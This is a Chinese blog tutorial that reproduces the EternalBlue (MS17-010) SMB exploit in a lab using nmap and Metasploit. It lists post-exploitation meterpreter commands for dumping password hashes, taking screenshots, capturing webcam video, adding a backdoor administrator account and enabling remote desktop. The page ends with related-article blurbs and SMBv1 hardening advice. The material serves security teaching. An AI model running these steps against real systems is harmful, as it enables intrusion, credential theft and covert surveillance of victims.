永恒之蓝漏洞ms17-010

已于 2023-05-03 21:40:19 修改
阅读量2k 收藏 29
点赞数
分类专栏: 网络安全 文章标签: 网络安全
于 2023-05-01 01:01:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_65336001/article/details/130453080
版权
本文详细介绍了永恒之蓝漏洞(MS17-010)的背景,如何利用这个漏洞对Windows系统进行攻击,包括信息收集、使用Metasploit框架进行漏洞复现及后渗透阶段的操作,如系统信息查看、密码哈希导出等,强调了网络安全的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本示例主要提供学习使用,不得用于违法犯罪

目录

什么是永恒之蓝

漏洞复现:

1、信息收集

 2、进入MSF利用永恒之蓝漏洞模块

3、后渗透阶段

什么是永恒之蓝

        永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers公布一大批网络攻击工具,其中包含“永恒之蓝”工具,
          “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒

        “WannaCry"勒索软件主要借鉴了针对微软Windows系统漏洞的“永恒之蓝”(EternalBlue)进行传播扩散,“永恒之蓝”攻击程序利用的是Windows SMB远程提权漏洞,可以攻击开放了445 端口的 Windows 系统并提升至系统权限,潜入电脑对多种文件类型加密,并弹出勒索框,向用户索要赎金(以比特币支付)用于解密

漏洞描述MS17-010:

        Microsoft Windows SMB Server远程代码执行漏洞 Microsoft Server Message Block 1.0 (SMBv1)服务器处 理某些请求时,在实现上存在远程代码执行漏洞,成功利用后可使攻击者在目标服务器上执行任意代码。如果攻击失败,会导致拒绝服务,对业务造成一定安全风险。 Microsoft Windows Server 2016、Microsoft Windows Server 2012 R2、Microsoft Windows Server 2012、 Microsoft Windows Server 2008 R2、Microsoft Windows Server 2008、Microsoft Windows RT 8.1等等

漏洞复现:

环境:

kali Linux

Windows7

(同一局域网下,可以ping通)

1、信息收集

使用nmap进行信息收集

发现存活主机:192.168.2.248

对192.168.2.248进行操作系统版本检测:

发现192.168.2.248是Microsoft Windows 7|2008|8.1

并且开放445端口,而永恒之蓝正是利用该端口的smb服务,操作系统溢出漏洞

 2、进入MSF利用永恒之蓝漏洞模块

打开MSF:msfconsole

 搜索漏洞,命令为:search ms17-010

exploit/windows/smb/ms17010eternalblue          是永恒之蓝攻击模块

auxiliary/scanner/smb/smbms17010                   是永恒之蓝扫描模块

两者一般配合使用,先扫描是否存在漏洞,在进行攻击

使用auxiliary/scanner/smb/smbms17010模块进行扫描

use auxiliary/scanner/smb/smb_ms17_010

设置目标主机IP

扫描run

出现该情况,说明存在ms17-010漏洞

使用exploit/windows/smb/ms17010eternalblue攻击模块

use exploit/windows/smb/ms17_010_eternalblue

设置攻击目标IP(win7):set rhosts 192.168.2.248

设置攻击者IP(kali):set lhost 192.168.2.166

kali的IP为192.168.2.166

 查看设置选项:show options

 开始攻击:run (exploit)

 攻击成功

3、后渗透阶段

sysinfo                   #查看目标主机系统信息
run scraper            #查看目标主机详细信息
hashdump             #导出密码的哈希
ps                          #查看目标主机进程信息
pwd                       #查看目标主机当前目录
screenshot            #截图
webcam_list          #查看目标主机的摄像头
webcam_snap        #拍照
webcam_stream      #打开视频
run getgui -u Client -p 123456                    #创建Client用户,密码为123456
net localgroup administrators Client /add   #将Client加入到win7的本地用户组中,以获得更大的权限
run getgui -e                       #开启远程桌面
rdesktop                             #打开远程桌面

*注意,部分命令在不同视图使用(kali终端,meterpreter,以及获取到靶机的shell命令视图下)

通过meterpreter获取屏幕快照:screenshot

 

查看权限:getuid

进入shell:shell

利用shell拿到的执行权限提权,就可以对靶机Win7进行控制

导出密码的哈希:hashdump

 破解xx的密码

 进行远程登陆:rdesktop

 

 

登录成功

以上是永恒之蓝漏洞利用部分演示,实际中可以做的事情很多,网络场景中可以利用的漏洞很多,网络安全的威胁无处不在

Windows - SMB 远程代码执行漏洞永恒之蓝- CVE-2017-0146 & MS17-010
Blue17 の 小窝
03-22 1227
永恒之蓝漏洞MS 17-010
Windows下的MS17-010永恒之蓝漏洞分析与复现
热门推荐
dgjkkhcf的博客
07-20 1万+
永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用美国国家安全局泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 ,“永恒之蓝”是利用Windows系统的SMB漏洞来获取Windows系统的最高权限。.........
ms17-010 永恒之蓝
qq_62803993的博客
01-12 5446
什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
Metasploit(MSF)渗透测试永恒之蓝实验
最新发布
weixin_40799218的博客
05-12 125
meterpreter中不仅有基本命令还有很多扩展库,下面就介绍一下常用的扩展库的查看方法。
永恒之蓝ms-17-010
尘玥的故事
07-18 819
2.saerch ms17-010 #命令搜索漏洞编号ms17-010相关模块。来到这个页面后的第一部是按键盘上的“i”键,左下角出现“插入”后说明操作正确。从下面的源内选择一个复制下来准备粘贴进去(都是优质源,复制哪个都可以)。尝试运行一个:screenshare—实时监控当前主机界面。换源vim /etc/apt/sources.list。-P:指定端口扫描(0-65535为全端口)使用“#”将原本的源给注释掉。-sC:使用内置脚本进行扫描。-sT:TCP全连接扫描。-sV:识别服务版本。
永恒之蓝(MS17-010)
人们并不感谢罗辑
08-06 1614
SMB协议SMB是一个协议服务器信息块,它是一个客户机/服务器,请求/响应协议,通过SMB协议可以在计算机间共享文件,命名管道等资源,电脑上网上邻居就是靠SMB实现的;
永恒之蓝检测工具MS17-010漏洞扫描工具 (全网段)
10-05
MS17-010漏洞扫描工具,在公司,或网吧,机器多的可以直接扫描 可直接输入指定的服务器,或客机扫描
Windows漏洞 MS17-010 / EternalBlue(永恒之蓝)工具-易语言
06-11
MS17-010 / EternalBlue(永恒之蓝漏洞 检测工具 百度百科: https://baike.baidu.com/item/永恒之蓝 本源码 无调用 任何模块 测试环境: Microsoft Windows XP x86 Microsoft Windows Server 2003 x86 漏洞涉及 ...
漏洞复现(一):永恒之蓝ms17-010
weixin_47306547的博客
11-02 6945
目录 永恒之蓝简介 SMB协议 SMB原理 漏洞原理 漏洞危害 漏洞复现 实验环境 完整过程 扫描目标主机是否存在该漏洞 实施攻击 漏洞利用 漏洞防御 永恒之蓝简介 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、...
漏洞复现-永恒之蓝MS17-010
qq_60848021的博客
09-19 3158
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
MS17-010批量漏洞扫描工具
07-18
windows环境下可以批量检测ms17-010漏洞的脆弱性的小工具
永恒之蓝检测工具MS17-010漏洞扫描工具
06-28
永恒之蓝检测工具MS17-010漏洞扫描工具
永恒之蓝漏洞
Kali与编程
05-02 1177
漏洞主要存在于Windows Server 2003、Windows XP、Windows 8以及Windows Server 2012等较老版本的操作系统中,尤其是对使用SMBv1(Server Message Block version 1)协议的系统影响尤为严重。永恒之蓝(EternalBlue) 是一个著名的网络安全漏洞,首次出现在2017年4月14日,由黑客组织“影子经纪人”(Shadow Brokers)公开披露了一系列据称源自美国国家安全局(NSA)的秘密网络武器。
网络安全入门第一课—永恒之蓝ms17-010
m0_56088051的博客
07-13 7035
一、永恒之蓝(Eternal Blue)永恒之蓝相关病毒,其实是利用了微软的MS17-010漏洞MS17-010是Windows系统一个底层服务的漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序二、实验环境。
Metasploit-MS17-010永恒之蓝 EternalBlue )复现
5L2g556F5ZWl77yf
09-09 1428
一. 概述 此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。 对于 Microsoft Windows 的所有受支持版本,此安全更新的等级为“严重”。有关详细信息,请参阅受影响的软件和漏洞严重等级部分。 此安全更新可通过更正 SMBv1 处理经特殊设计的请求的方式来修复这些漏洞。 有关这些漏洞的详细信息,请参阅漏洞信息部分。 EternalChampion 永恒冠军(CVE-
新手第一个漏洞复现:MS17-010(永恒之蓝)
爆金币了,老登!
06-28 466
第一个漏洞推荐复现,永恒之蓝,从此为基础可以自己复现其他漏洞
MS17-010远程溢出漏洞(永恒之蓝)
小小猪的博客
06-10 497
MS17-010远程溢出漏洞(永恒之蓝) 实验环境 操作机:kali 2017 操作机IP:172.16.11.2 目标机:windows7 目标机IP:172.16.12.2 打开nmap进行扫描目标主机开放哪些端口 终端打开msfconsole 使用search 命令查找ms17-010漏洞相关模块 使用use 命令选择我们要使用的扫描模块 在运行模块之前,需要设置相关选项,我们使用show options 查看配置信息 需要设置目标地址,设置命令 设..
EternalBlue【永恒之蓝漏洞详解,网络安全基础教程第4版
m0_61549984的博客
04-07 1020
2017永恒之蓝漏洞,编号为ms17_010漏洞。自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
永恒之蓝MS17-010)防御
12-30
### 防御 MS17-010 永恒之蓝漏洞的安全措施 #### 及时安装官方补丁 为了防止受到永恒之蓝漏洞的影响,最直接有效的方式就是及时安装来自微软发布的安全更新。对于受支持的操作系统版本,应尽快应用最新的累积更新包,这些更新包含了针对已知漏洞的修复程序[^1]。 #### 关闭不必要的服务与端口 如果不需要使用 SMBv1 协议,则建议将其禁用。因为该协议存在安全隐患,并且是此次攻击所依赖的关键组件之一。可以通过修改注册表或组策略来实现这一目的。另外还需要注意关闭其他可能成为入侵途径的服务和开放端口[^3]。 ```powershell Set-SmbServerConfiguration -EnableSMB1Protocol $false ``` #### 使用防火墙增强边界保护 配置本地防火墙规则阻止外部访问易受攻击的TCP 445端口(即Microsoft-Ds),这能够有效地减少暴露在外的风险面。同时也要定期审查现有的入站连接请求并调整相应的过滤条件以适应不断变化的威胁形势[^4]。 #### 加强身份验证机制 采用多因素认证(MFA),提高账户安全性;设置复杂度较高的密码组合方式,并强制要求用户定期更改登录凭证;限制管理员权限范围内的活动频率及其持续时间等手段都可以显著降低潜在危害程度[^2]。 #### 实施终端检测响应方案(TDR) 部署专业的防病毒软件产品以及EDR平台可以帮助识别异常行为模式并对可疑进程实施拦截处理动作,在第一时间遏制住恶意企图的发展态势。此外还可以考虑引入沙箱技术来进行未知样本分析工作从而提前预警新型变种形式的发生可能性。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值